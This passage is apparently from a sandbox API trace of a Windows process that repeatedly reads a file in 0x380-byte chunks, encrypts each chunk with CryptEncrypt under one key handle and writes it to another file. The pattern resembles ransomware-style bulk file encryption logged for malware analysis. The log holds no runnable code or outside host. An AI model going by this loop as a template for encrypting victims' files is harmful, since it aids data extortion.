lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.682] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.682] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.682] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.683] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.683] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.683] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.683] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.683] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.683] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.683] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.683] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.683] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.683] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.684] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.684] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.684] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.684] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.684] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.684] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.684] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.684] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.684] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.684] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.684] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.684] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.685] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.685] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.685] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.685] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.685] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.685] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.685] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.685] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.685] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.685] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.685] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.685] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.698] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.698] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.698] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.698] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.698] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.699] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.699] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.699] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.699] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.699] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.699] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.699] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.699] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.699] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.700] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.700] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.700] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.700] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.700] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.749] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.750] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.750] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.750] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.750] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.751] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.751] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.751] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.751] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.752] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.752] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.752] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.752] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.752] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.753] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.753] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.753] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.753] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.753] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.754] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.754] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.754] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.754] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.754] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.754] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.755] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.755] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.755] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.755] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.755] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.755] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.756] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.756] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.756] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.756] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.756] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.756] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.757] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.758] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.758] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.785] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.785] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.785] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.785] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, 